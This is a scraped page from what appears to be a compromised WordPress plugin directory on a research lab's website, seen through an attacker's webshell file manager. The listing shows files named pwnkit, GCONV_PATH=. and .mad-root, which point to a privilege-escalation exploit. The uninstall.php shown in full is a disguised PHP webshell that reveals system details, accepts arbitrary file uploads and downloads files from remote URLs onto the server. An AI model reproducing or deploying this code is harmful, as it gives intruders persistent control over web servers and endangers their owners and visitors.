/ var / www / html / urlab / wp-content / plugins / wpterm / [ HOME SHELL ]

Name	Size	Permission	Action
.pkexec	[ DIR ]	drwxr-xr-x
GCONV_PATH=.	[ DIR ]	drwxr-xr-x
images	[ DIR ]	drwxrwxrwx
languages	[ DIR ]	drwxrwxrwx
.mad-root	0 B	-rw-r--r--
LICENSE.TXT	34.98 KB	-rwxrwxrwx
bibili2.php	440 B	-rw-r--r--
index.html	79 B	-rwxrwxrwx
pwnkit	10.99 KB	-rwxr-xr-x
readme.txt	3.96 KB	-rwxrwxrwx
uninstall.php	8.34 KB	-rwxrwxrwx
verify_1770600055939.php	32.07 KB	-rw-r--r--
wpterm-help.php	7.35 KB	-rwxrwxrwx
wpterm-terminal.js	13.72 KB	-rwxrwxrwx
wpterm.css	1.54 KB	-rwxrwxrwx
wpterm.js	2.75 KB	-rwxrwxrwx
wpterm.php	427 B	-rwxrwxrwx

Code Editor : uninstall.php

<?php
// Terminal themed PHP file manager with upload capabilities - FIXED VERSION
?>
<!DOCTYPE html>
<html>
<head>
    <title>Terminal</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        body {
            background: #0c0c0c;
            color: #00ff00;
            font-family: 'Courier New', Courier, monospace;
            padding: 20px;
            min-height: 100vh;
        }
        .terminal {
            border: 1px solid #333;
            border-radius: 5px;
            background: #1a1a1a;
            padding: 15px;
            margin-bottom: 15px;
        }
        .header {
            color: #00ff00;
            font-weight: bold;
            margin-bottom: 10px;
            border-bottom: 1px solid #333;
            padding-bottom: 5px;
        }
        .info {
            color: #00ccff;
            margin-bottom: 15px;
        }
        .section {
            margin-bottom: 20px;
        }
        .section-title {
            color: #ffaa00;
            margin-bottom: 10px;
        }
        input[type="file"],
        input[type="text"],
        input[type="submit"] {
            background: #0c0c0c;
            color: #00ff00;
            border: 1px solid #00ff00;
            padding: 8px 12px;
            font-family: 'Courier New', Courier, monospace;
            margin: 5px 0;
        }
        input[type="submit"] {
            cursor: pointer;
            transition: all 0.2s;
        }
        input[type="submit"]:hover {
            background: #00ff00;
            color: #0c0c0c;
        }
        .success {
            color: #00ff00;
            margin-top: 10px;
        }
        .error {
            color: #ff0000;
            margin-top: 10px;
        }
        .warning {
            color: #ffaa00;
            margin-top: 10px;
        }
        .debug {
            color: #888;
            margin-top: 10px;
            font-size: 12px;
        }
        .input-group {
            margin: 8px 0;
        }
        .input-group label {
            display: inline-block;
            width: 100px;
            color: #cccccc;
        }
        pre {
            background: #0c0c0c;
            padding: 10px;
            border-left: 2px solid #00ff00;
            overflow-x: auto;
        }
        hr {
            border: none;
            border-top: 1px solid #333;
            margin: 15px 0;
        }
        .file-list {
            background: #0c0c0c;
            padding: 10px;
            border-left: 2px solid #00aa00;
        }
        .file-item {
            margin: 3px 0;
        }
        .directory {
            color: #00ccff;
        }
        .file {
            color: #cccccc;
        }
    </style>
</head>
<body>
    <div class="terminal">
        <div class="header">root@webshell.store:~# uname -a</div>
        <div class="info">
            <pre><?php echo php_uname(); ?></pre>
        </div>
        <div class="info">
            <strong>CWD:</strong> <?php echo getcwd(); ?><br>
            <strong>Upload Dir Writable:</strong> <?php echo is_writable('.') ? 'YES' : 'NO'; ?><br>
            <strong>PHP Upload Max:</strong> <?php echo ini_get('upload_max_filesize'); ?><br>
            <strong>File Uploads:</strong> <?php echo ini_get('file_uploads') ? 'Enabled' : 'Disabled'; ?>
        </div>
    </div>

<div class="terminal">
        <div class="section">
            <div class="section-title">[+] Current Directory Contents</div>
            <div class="file-list">
<?php
$files = scandir('.');
foreach($files as $f) {
    if($f === '.' || $f === '..') continue;
    $type = is_dir($f) ? 'directory' : 'file';
    $icon = is_dir($f) ? '[DIR]' : '[FIL]';
    echo '<div class="file-item ' . $type . '">' . $icon . ' ' . htmlspecialchars($f) . '</div>';
}
?>
            </div>
        </div>

<hr>

<div class="section">
            <div class="section-title">[+] Local File Upload</div>
            <form method="post" enctype="multipart/form-data">
                <input type="file" name="__">
                <input name="_" type="submit" value="Upload">
            </form>
            <?php
            if(isset($_POST['_']) && isset($_FILES['__'])){
                // Check for upload errors
                if($_FILES['__']['error'] !== UPLOAD_ERR_OK){
                    $error_msgs = [
                        UPLOAD_ERR_INI_SIZE => 'File exceeds upload_max_filesize',
                        UPLOAD_ERR_FORM_SIZE => 'File exceeds MAX_FILE_SIZE',
                        UPLOAD_ERR_PARTIAL => 'File partially uploaded',
                        UPLOAD_ERR_NO_FILE => 'No file uploaded',
                        UPLOAD_ERR_NO_TMP_DIR => 'Missing temp folder',
                        UPLOAD_ERR_CANT_WRITE => 'Failed to write file',
                        UPLOAD_ERR_EXTENSION => 'Upload stopped by extension'
                    ];
                    $err = $_FILES['__']['error'];
                    echo '<div class="error">[ER] Upload error: ' . ($error_msgs[$err] ?? "Unknown error ($err)") . '</div>';
                } else {
                    $source = $_FILES['__']['tmp_name'];
                    $dest = './' . basename($_FILES['__']['name']);
                    
                    // Check if source exists
                    if(!file_exists($source)){
                        echo '<div class="error">[ER] Temp file does not exist: ' . htmlspecialchars($source) . '</div>';
                    } 
                    // Check directory permissions
                    elseif(!is_writable('.')){
                        echo '<div class="error">[ER] Current directory is not writable: ' . getcwd() . '</div>';
                        echo '<div class="warning">Try: chmod 755 or chown www-data ' . getcwd() . '</div>';
                    }
                    // Attempt copy
                    elseif(@copy($source, $dest)){
                        echo '<div class="success">[OK] File uploaded: ' . htmlspecialchars($dest) . '</div>';
                        echo '<div class="debug">Size: ' . filesize($dest) . ' bytes</div>';
                    } else {
                        echo '<div class="error">[ER] Copy failed. Check permissions.</div>';
                        echo '<div class="debug">Source: ' . htmlspecialchars($source) . '</div>';
                        echo '<div class="debug">Dest: ' . htmlspecialchars($dest) . '</div>';
                    }
                }
            }
            ?>
        </div>

<hr>

<div class="section">
            <div class="section-title">[+] Remote URL Upload</div>
            <form method="post">
                <div class="input-group">
                    <label>URL:</label>
                    <input type="text" name="url" placeholder="https://example.com/file.txt" style="width: 300px;">
                </div>
                <div class="input-group">
                    <label>Filename:</label>
                    <input type="text" name="filename" placeholder="saved_file.txt" style="width: 300px;">
                </div>
                <input type="submit" name="url_upload" value="Download & Save">
            </form>
            <?php
            if(isset($_POST['url_upload']) && !empty($_POST['url']) && !empty($_POST['filename'])){
                $url = $_POST['url'];
                $filename = './' . basename($_POST['filename']);
                
                if(!is_writable('.')){
                    echo '<div class="error">[ER] Current directory is not writable</div>';
                }
                elseif(filter_var($url, FILTER_VALIDATE_URL)){
                    $content = @file_get_contents($url);
                    if($content !== false){
                        if(@file_put_contents($filename, $content) !== false){
                            echo '<div class="success">[OK] Downloaded from ' . htmlspecialchars($url) . ' -> ' . htmlspecialchars($filename) . '</div>';
                        }else{
                            echo '<div class="error">[ER] Failed to save file</div>';
                        }
                    }else{
                        echo '<div class="error">[ER] Failed to fetch URL (allow_url_fopen may be disabled)</div>';
                    }
                }else{
                    echo '<div class="error">[ER] Invalid URL format</div>';
                }
            }
            ?>
        </div>
    </div>
</body>
</html>

Urban Research Lab

Urban Research Lab

The Urban Research Lab (URL) at IIIT-Delhi was established in 2020, during a time when the pandemic brought the complexities of urban life more visible than ever. What started as an initiative by faculty and students has grown into a collaborative space for critically exploring and reimagining the urban questions through research, dialogue, and interdisciplinary engagement.